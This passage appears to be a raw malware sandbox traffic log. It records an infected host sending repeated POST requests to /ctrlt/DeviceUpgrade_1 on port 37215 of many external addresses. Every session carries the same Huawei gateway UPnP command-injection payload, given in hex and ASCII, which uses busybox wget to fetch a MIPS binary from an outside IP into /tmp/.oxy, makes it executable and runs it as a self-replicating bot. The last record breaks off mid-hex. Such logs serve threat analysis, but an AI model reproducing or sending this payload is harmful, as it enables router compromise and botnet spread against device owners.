                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  781192.168.2.135794224.47.203.19337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.417135000 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  782192.168.2.1336208197.61.72.5937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.417152882 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  783192.168.2.1332814157.11.158.9237215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.417161942 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  784192.168.2.1356076157.143.171.6937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.417185068 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  785192.168.2.135005041.36.247.10537215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.417212009 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  786192.168.2.135925041.109.30.24337215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.417226076 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  787192.168.2.1343390197.2.226.14037215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.417237997 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  788192.168.2.1356876197.134.197.7737215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.417370081 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  789192.168.2.1341112170.123.222.14837215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.417390108 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 61.14.232.254 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  790192.168.2.1346104197.35.74.937215
                                                  TimestampBytes transferredDirectionData
                                                  May 29, 2024 15:15:16.417601109 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 36 31 2e 31 34 2e 32 33 32 2e 32 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 